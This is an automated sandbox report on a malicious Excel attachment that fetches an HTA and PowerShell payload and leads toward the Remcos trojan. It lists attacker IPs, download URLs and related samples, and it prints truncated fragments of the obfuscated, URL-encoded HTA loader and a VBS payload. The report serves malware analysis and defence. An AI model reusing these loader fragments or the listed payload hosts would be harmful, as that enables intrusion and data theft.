                        		unknown
                        http://185.235.137.223/200/pictureupdatedwithnewquality.tIFppowershell.exe, 00000007.00000002.490691993.0000000002730000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contextual.media.net/bhv1E0C.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.jsbhv1E0C.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2bhv1E0C.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://185.235Hpowershell.exe, 0000000E.00000002.505047293.0000000003277000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.msn.com/bhv1E0C.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:aubhv1E0C.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0mshta.exe, 00000004.00000003.474232984.000000000370D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476741693.0000000003710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474811501.000000000370F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.475368209.000000000370F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.496333686.000000001C21C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C223000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C237000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549bhv1E0C.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://ia601706.us.archive.orgpowershell.exe, 0000000E.00000002.505047293.00000000025D2000.00000004.00000800.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://185.235.137.223/200/Nhpowershell.exe, 0000000E.00000002.505047293.0000000003277000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.htajVpl(mshta.exe, 00000004.00000002.476023425.000000000048A000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://cdn.at.atwola.com/_media/uac/msn.htmlbhv1E0C.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.google.com/accounts/serviceloginRegAsm.exefalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.htahttp://185.235.137.223/xampp/ceo/IEnetcmshta.exe, 00000004.00000003.475198799.0000000002765000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fsetbhv1E0C.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://secure.comodo.com/CPS0mshta.exe, 00000004.00000003.474232984.000000000370D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476741693.0000000003710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474811501.000000000370F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.475368209.000000000370F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.496333686.000000001C1A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.496333686.000000001C21C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.496333686.000000001C1FD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C223000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521079738.000000001ABB1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C237000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://policies.yahoo.com/w3c/p3p.xmlbhv1E0C.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://crl.entrust.net/2048ca.crl0mshta.exe, 00000004.00000003.474232984.000000000370D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476741693.0000000003710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474811501.000000000370F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.475368209.000000000370F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.496333686.000000001C21C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C223000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.msn.com/advertisement.ad.jsbhv1E0C.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.ebuddy.comRegAsm.exe, RegAsm.exe, 0000001A.00000002.511886062.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        207.241.227.96
                        		ia601706.us.archive.orgUnited States
                        		7941INTERNET-ARCHIVEUStrue
                        192.3.101.29
                        		camzeroconnect.duckdns.orgUnited States
                        		36352AS-COLOCROSSINGUStrue
                        185.235.137.223
                        		unknownIran (ISLAMIC Republic Of)
                        		202391AFRARASAIRtrue
                        95.217.202.210
                        		zeep.lyGermany
                        		24940HETZNER-ASDEfalse
                        178.237.33.50
                        		geoplugin.netNetherlands
                        		8455ATOM86-ASATOM86NLfalse

                        General Information

                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1508122
                        Start date and time:2024-09-09 17:47:10 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 8m 20s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:defaultwindowsofficecookbook.jbs
                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                        Number of analysed new started processes analysed:29
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • GSI enabled (VBA)
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:RFQ_0230909024SEPT.xla.xlsx
                        Detection:MAL
                        Classification:mal100.rans.phis.troj.spyw.expl.evad.winXLSX@38/28@5/5
                        EGA Information:
                        • Successful, ratio: 85.7%
                        HCA Information:
                        • Successful, ratio: 99%
                        • Number of executed functions: 173
                        • Number of non-executed functions: 298
                        Cookbook Comments:
                        • Found application associated with file extension: .xlsx
                        • Found Word or Excel or PowerPoint or XPS Viewer
                        • Attach to Office via COM
                        • Active ActiveX Object
                        • Active ActiveX Object
                        • Scroll down
                        • Close Viewer

                        Warnings

                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                        • Execution Graph export aborted for target mshta.exe, PID 3504 because there are no executed function
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        • VT rate limit hit for: RFQ_0230909024SEPT.xla.xlsx

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        11:48:56API Interceptor52x Sleep call for process: mshta.exe modified
                        11:48:59API Interceptor222x Sleep call for process: powershell.exe modified
                        11:49:06API Interceptor3x Sleep call for process: wscript.exe modified
                        11:49:13API Interceptor433x Sleep call for process: RegAsm.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        207.241.227.96xrrwwstCMd.docxGet hashmaliciousRemcosBrowse
                          192.3.101.29SWIFT050924.vbsGet hashmaliciousRemcosBrowse
                            Revised SOA-INV023010924.xla.xlsxGet hashmaliciousRemcosBrowse
                              RFQ_0030829024SEPT.xla.xlsxGet hashmaliciousRemcosBrowse
                                SecuriteInfo.com.Exploit.CVE-2017-11882.123.9070.28632.rtfGet hashmaliciousRemcosBrowse
                                  PMT-INV0230824AUG.xla.xlsxGet hashmaliciousRemcosBrowse
                                    SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtfGet hashmaliciousRemcosBrowse
                                      PA-INV0230824 AUG.xla.xlsxGet hashmaliciousRemcosBrowse
                                        RFQ_0826024.xla.xlsxGet hashmaliciousRemcosBrowse
                                          RFQ-009230820240.xla.xlsxGet hashmaliciousRemcosBrowse
                                            RFQ-00923082024.xla.xlsxGet hashmaliciousRemcosBrowse
                                              185.235.137.223buttersmoothcrashcandy.rtfGet hashmaliciousUnknownBrowse
                                              • 185.235.137.223/69/shoppingfestivalsessiononherewithyou.tIF
                                              95.217.202.210xrrwwstCMd.docxGet hashmaliciousRemcosBrowse
                                              • zeep.ly/rXgoN
                                              178.237.33.50xrrwwstCMd.docxGet hashmaliciousRemcosBrowse
                                              • geoplugin.net/json.gp
                                              fYHJsEQSv0.exeGet hashmaliciousRemcosBrowse
                                              • geoplugin.net/json.gp
                                              PxPsy1hml9.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                              • geoplugin.net/json.gp
                                              XQmV6MKs53.exeGet hashmaliciousRemcosBrowse
                                              • geoplugin.net/json.gp
                                              GN31O4pSQN.exeGet hashmaliciousRemcosBrowse
                                              • geoplugin.net/json.gp
                                              OriginalBLShippingDocumentsInvoiceAwbCIPL0000.batGet hashmaliciousRemcos, GuLoaderBrowse
                                              • geoplugin.net/json.gp
                                              DHL AWB BL Copy 8900893000.exeGet hashmaliciousRemcosBrowse
                                              • geoplugin.net/json.gp
                                              Quotation.exeGet hashmaliciousRemcosBrowse
                                              • geoplugin.net/json.gp
                                              rfq_final_quater_product_purchase_order_import_list_09_09_2024_00000024.cmdGet hashmaliciousGuLoader, RemcosBrowse
                                              • geoplugin.net/json.gp
                                              NDA_MD580 project.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                              • geoplugin.net/json.gp

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              ia601706.us.archive.orgxrrwwstCMd.docxGet hashmaliciousRemcosBrowse
                                              • 207.241.227.96
                                              camzeroconnect.duckdns.orgSWIFT050924.vbsGet hashmaliciousRemcosBrowse
                                              • 192.3.101.29
                                              geoplugin.netxrrwwstCMd.docxGet hashmaliciousRemcosBrowse
                                              • 178.237.33.50
                                              fYHJsEQSv0.exeGet hashmaliciousRemcosBrowse
                                              • 178.237.33.50
                                              PxPsy1hml9.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                              • 178.237.33.50
                                              XQmV6MKs53.exeGet hashmaliciousRemcosBrowse
                                              • 178.237.33.50
                                              GN31O4pSQN.exeGet hashmaliciousRemcosBrowse
                                              • 178.237.33.50
                                              OriginalBLShippingDocumentsInvoiceAwbCIPL0000.batGet hashmaliciousRemcos, GuLoaderBrowse
                                              • 178.237.33.50
                                              DHL AWB BL Copy 8900893000.exeGet hashmaliciousRemcosBrowse
                                              • 178.237.33.50
                                              Quotation.exeGet hashmaliciousRemcosBrowse
                                              • 178.237.33.50
                                              rfq_final_quater_product_purchase_order_import_list_09_09_2024_00000024.cmdGet hashmaliciousGuLoader, RemcosBrowse
                                              • 178.237.33.50
                                              NDA_MD580 project.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                              • 178.237.33.50
                                              zeep.lyxrrwwstCMd.docxGet hashmaliciousRemcosBrowse
                                              • 95.217.202.210
                                              http://goofle.comGet hashmaliciousUnknownBrowse
                                              • 95.217.202.210

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              INTERNET-ARCHIVEUSxrrwwstCMd.docxGet hashmaliciousRemcosBrowse
                                              • 207.241.227.96
                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.15030.28858.rtfGet hashmaliciousRemcosBrowse
                                              • 207.241.224.2
                                              PO FT-151-2024 PETROMAT.xlsGet hashmaliciousRemcosBrowse
                                              • 207.241.232.154
                                              Inquiry_0476452.xlsGet hashmaliciousRemcosBrowse
                                              • 207.241.224.2
                                              Request for Quotation_1.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                              • 207.241.227.86
                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.4528.19655.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 207.241.232.154
                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtfGet hashmaliciousRemcosBrowse
                                              • 207.241.224.2
                                              INV4092401.docx.docGet hashmaliciousRemcosBrowse
                                              • 207.241.232.154
                                              comprobante.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                              • 207.241.232.154
                                              PO_00978876.vbsGet hashmaliciousUnknownBrowse
                                              • 207.241.232.154
                                              AFRARASAIRbuttersmoothcrashcandy.rtfGet hashmaliciousUnknownBrowse
                                              • 185.235.137.223
                                              SecuriteInfo.com.Linux.Siggen.9999.15938.22369.elfGet hashmaliciousMiraiBrowse
                                              • 185.49.104.3
                                              an3gpDV7uW.exeGet hashmaliciousLummaCBrowse
                                              • 185.235.137.54
                                              paTWrNAira.exeGet hashmaliciousLummaCBrowse
                                              • 185.235.137.54
                                              2gQsoHaGEm.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                              • 185.235.137.54
                                              xvJv1BpknZ.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                              • 185.235.137.54
                                              PxuZ1WpCgf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                              • 185.235.137.54
                                              TEILll7BsZ.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                              • 185.235.137.54
                                              Pd3mM82Bs6.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                              • 185.235.137.54
                                              c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                              • 185.235.137.54
                                              HETZNER-ASDExrrwwstCMd.docxGet hashmaliciousRemcosBrowse
                                              • 95.217.202.210
                                              myfile.exeGet hashmaliciousSodinokibi, Chaos, Netwalker, Revil, TrojanRansomBrowse
                                              • 188.40.30.106
                                              doc_rfq Oferta KH 09281.pdf.com.exeGet hashmaliciousQuasarBrowse
                                              • 195.201.57.90
                                              Quotation.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 135.181.160.46
                                              uD9I18eLZ6.exeGet hashmaliciousPureLog Stealer, Raccoon Stealer v2, RedLine, zgRATBrowse
                                              • 116.203.232.114
                                              http://pratikg7028.github.io/Task4Get hashmaliciousHTMLPhisherBrowse
                                              • 78.46.22.25
                                              IDMan.exeGet hashmaliciousFredy StealerBrowse
                                              • 5.161.243.5
                                              IDMan.exeGet hashmaliciousFredy StealerBrowse
                                              • 5.161.243.5
                                              FZ6oyLoqGM.exeGet hashmaliciousUnknownBrowse
                                              • 159.69.88.171
                                              bin homebots io.batGet hashmaliciousUnknownBrowse
                                              • 195.201.57.90
                                              AS-COLOCROSSINGUSGN31O4pSQN.exeGet hashmaliciousRemcosBrowse
                                              • 192.3.243.155
                                              Quotation.exeGet hashmaliciousRemcosBrowse
                                              • 23.95.60.82
                                              NDA_MD580 project.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                              • 192.210.150.17
                                              ORDER-249034489.XLS.jsGet hashmaliciousWSHRatBrowse
                                              • 192.210.215.11
                                              SWIFT050924.vbsGet hashmaliciousRemcosBrowse
                                              • 192.3.101.29
                                              17257307446d2d2990dfa7f8d43acc2caad03e86776087a4660c3bfc636a9c02b09252085d196.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                              • 192.3.101.17
                                              AMERICAN GROUP.jsGet hashmaliciousRemcosBrowse
                                              • 192.3.101.17
                                              https://saledelivery.zone/?cp=fmlcqhobGet hashmaliciousUnknownBrowse
                                              • 104.168.101.21
                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.15030.28858.rtfGet hashmaliciousRemcosBrowse
                                              • 192.3.101.254
                                              vsi5ci7Lwd.exeGet hashmaliciousAsyncRATBrowse
                                              • 198.23.197.108

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              05af1f5ca1b87cc9cc9b25185115607dxrrwwstCMd.docxGet hashmaliciousRemcosBrowse
                                              • 207.241.227.96
                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.15030.28858.rtfGet hashmaliciousRemcosBrowse
                                              • 207.241.227.96
                                              PO FT-151-2024 PETROMAT.xlsGet hashmaliciousRemcosBrowse
                                              • 207.241.227.96
                                              Inquiry_0476452.xlsGet hashmaliciousRemcosBrowse
                                              • 207.241.227.96
                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.4528.19655.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 207.241.227.96
                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtfGet hashmaliciousRemcosBrowse
                                              • 207.241.227.96
                                              INV4092401.docx.docGet hashmaliciousRemcosBrowse
                                              • 207.241.227.96
                                              comprobante.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                              • 207.241.227.96
                                              Bill of Lading.xlsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 207.241.227.96
                                              Purchase Order.xlsmGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 207.241.227.96
                                              7dcce5b76c8b17472d024758970a406bxrrwwstCMd.docxGet hashmaliciousRemcosBrowse
                                              • 95.217.202.210
                                              PO FT-151-2024 PETROMAT.xlsGet hashmaliciousRemcosBrowse
                                              • 95.217.202.210
                                              Inquiry_0476452.xlsGet hashmaliciousRemcosBrowse
                                              • 95.217.202.210
                                              INV4092401.docx.docGet hashmaliciousRemcosBrowse
                                              • 95.217.202.210
                                              Bill of Lading.xlsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 95.217.202.210
                                              QUOTATION_SEPQTRA071244#U00faPDF.scrGet hashmaliciousUnknownBrowse
                                              • 95.217.202.210
                                              SecuriteInfo.com.Other.Malware-gen.18317.3179.xlsxGet hashmaliciousUnknownBrowse
                                              • 95.217.202.210
                                              SecuriteInfo.com.Other.Malware-gen.18317.3179.xlsxGet hashmaliciousUnknownBrowse
                                              • 95.217.202.210
                                              SecuriteInfo.com.Trojan.GenericKD.73998107.10440.22732.xlsxGet hashmaliciousUnknownBrowse
                                              • 95.217.202.210
                                              SecuriteInfo.com.Exploit.CVE-2017-0199.121.20522.7152.xlsxGet hashmaliciousFormBookBrowse
                                              • 95.217.202.210

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):4742
                                              Entropy (8bit):4.8105940880640246
                                              Encrypted:false
                                              SSDEEP:96:mCJ2Woe5Sgyg12jDs+un/iQLEYFjDaeWJ6KGcmXuFRLcU6/KI2k6Lm5emmXIG:Jxoe5+gkjDt4iWN3yBGH+dcU6CIVsm5D
                                              MD5:278C40A9A3B321CA9147FFBC6BE3A8A8
                                              SHA1:D795FC7D3249F9D924DC951DA1DB900D02496D73
                                              SHA-256:4EB0EAE13C3C67789AD8940555F31548A66F5031BF1A804E26EA6E303515259E
                                              SHA-512:E7222B41A436CE0BF8FA3D8E5EB8249D4D3985419D0F901F535375789F001B5929EF9B85C1D6802F0FBD5F722A52CB27021F87D076E69D92F46C7C3E894C6F00
                                              Malicious:false
                                              Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script............7...q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1m.......Remove-Variable........Convert-String........Trace-Command........Sort-Object........Register-Object

                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):64
                                              Entropy (8bit):0.34726597513537405
                                              Encrypted:false
                                              SSDEEP:3:Nlll:Nll
                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                              Malicious:false
                                              Preview:@...e...........................................................

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\IEnetcateudpationprocess[1].hta

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
                                              Category:modified
                                              Size (bytes):150707
                                              Entropy (8bit):2.0237819490676623
                                              Encrypted:false
                                              SSDEEP:96:Ea+Cw77d4BqFbzuBqFwaXSGFvLjuKGBqFTzbT:Ea+Ck7E4bg4wXGk4TnT
                                              MD5:4FA3C9C0821D023F37A022E02D3C5A63
                                              SHA1:5C793E304F7B37FB0AB3DBE03526DB9AB42765A8
                                              SHA-256:6F5854648EE6114AAE0E2636287B4415A80D15D6CC1126568FB2FEDA06F06A16
                                              SHA-512:149B1D5AE609455FCF86533719737FEBE6AB13343B8A4FACEA6093FBB1677F1A5F812A312BC95433C131636AF024512E25B5D49EAE665BF66EB2F7DB4E70772E
                                              Malicious:true
                                              Preview:<script>.. ..document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%253E%250A%253C%2521--%250Adocument.write%2528unescape%2528%2522%25253Cscript%252520language%25253DJavaScript%25253Em%25253D%252527%2525253C%25252521DOCTYPE%25252520html%2525253E%2525250A%2525253Cmeta%25252520http-equiv%2525253D%25252522X-UA-Compatible%25252522%25252520content%2525253D%25252522IE%2525253DEmulateIE8%25252522%25252520%2525253E%2525250A%2525253Chtml%2525253E%2525250A%2525253Cbody%2525253E%2525250A%2525253CScript%25252520laNgUAGE%2525253D%25252522vbScRiPt%25252522%2525253E%2525250ADiM%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\pictureupdatedwithnewquality[1].tiff

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):194206
                                              Entropy (8bit):3.8801703450865306
                                              Encrypted:false
                                              SSDEEP:3072:7merF4nF3I2A7lE9QVBpEE8gt5pdGwpgCGy8/tpmqDyJVvnpUcFoqszc:7JrF4VI9lE9aGOVvnpUcFoqszc
                                              MD5:9E0D5ADD50B62609B0D1A62A2B51B13A
                                              SHA1:6D23598F979CF1E8815A0AF91D68249E36272DFC
                                              SHA-256:E06A1DD0178864407F0E0BD4BC036E56B1D943AA07EAA743432FF16A70F38365
                                              SHA-512:F72E53232F1F382800DDA2536DCA4D8345F4B24F156CC41E8DC4DF3074908A51043F27B4B5E4A67F9BB577B9334C62C8D7CDE3D5D7E9B1D136E818822FBDF1DA
                                              Malicious:false
                                              Preview:..u.W.b.G.g.W.l.m.G.L.i.f. .=. .".P.W.z.f.W.P.p.U.z.i.N.q.".....u.p.L.O.c.z.Z.W.p.L.W.d. .=. .".L.W.W.O.W.W.W.k.a.G.v.n.".....W.L.j.i.A.H.x.U.p.m.K.U. .=. .".L.o.Z.U.h.i.e.e.A.G.u.K.".....b.m.q.c.W.b.H.K.b.k.i.B. .=. .".t.L.z.n.j.m.N.G.e.A.A.i.".....A.A.o.L.a.Z.N.W.N.e.L.h. .=. .".d.G.a.A.N.e.G.q.m.l.J.b.".....P.U.k.r.R.K.U.b.x.N.o.m. .=. .".e.o.h.G.c.e.l.c.h.H.o.I.".....K.W.N.I.P.u.L.L.Z.u.p.C. .=. .".L.i.h.f.g.m.q.z.i.L.L.L.".....T.v.P.n.z.k.A.B.a.p.x.P. .=. .".P.W.C.x.U.Q.K.G.i.f.a.O.".....U.c.L.t.c.m.L.N.p.m.v.W. .=. .".z.W.L.P.S.L.L.a.s.s.L.L.".....c.x.R.x.K.t.a.U.O.z.o.W. .=. .".G.q.C.z.G.c.b.L.N.T.Z.k.".........U.L.A.C.x.G.W.W.c.G.m.Z. .=. .".Z.g.u.C.i.K.L.W.e.o.K.p.".....W.K.h.J.W.K.k.q.Q.R.u.x. .=. .".x.k.L.W.C.U.c.N.b.f.b.d.".....x.L.P.O.h.d.u.L.U.b.o.g. .=. .".L.K.Z.p.m.P.W.K.L.L.L.c.".....P.m.g.L.O.u.W.h.R.l.L.O. .=. .".Z.o.A.n.k.x.b.e.t.G.W.e.".....T.R.A.p.i.o.G.k.n.c.k.c. .=. .".k.L.i.L.i.d.R.S.n.J.h.P.".....b.q.b.b.U.Z.u.B.k.o.H.o. .=. .".z.W.k.Z.W.W.W.L.e.o.W.e.".....i.

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\json[1].json

                                              Download File
                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):962
                                              Entropy (8bit):5.013130376969173
                                              Encrypted:false
                                              SSDEEP:12:tklu+mnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qlu+KdVauKyGX85jvXhNlT3/7AcV9Wro
                                              MD5:F61E5CC20FBBA892FF93BFBFC9F41061
                                              SHA1:36CD25DFAD6D9BC98697518D8C2F5B7E12A5864E
                                              SHA-256:28B330BB74B512AFBD70418465EC04C52450513D3CC8609B08B293DBEC847568
                                              SHA-512:5B6AD2F42A82AC91491C594714638B1EDCA26D60A9932C96CBA229176E95CA3FD2079B68449F62CBFFFFCA5DA6F4E25B7B49AF8A8696C95A4F11C54BCF451933
                                              Malicious:false
                                              Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

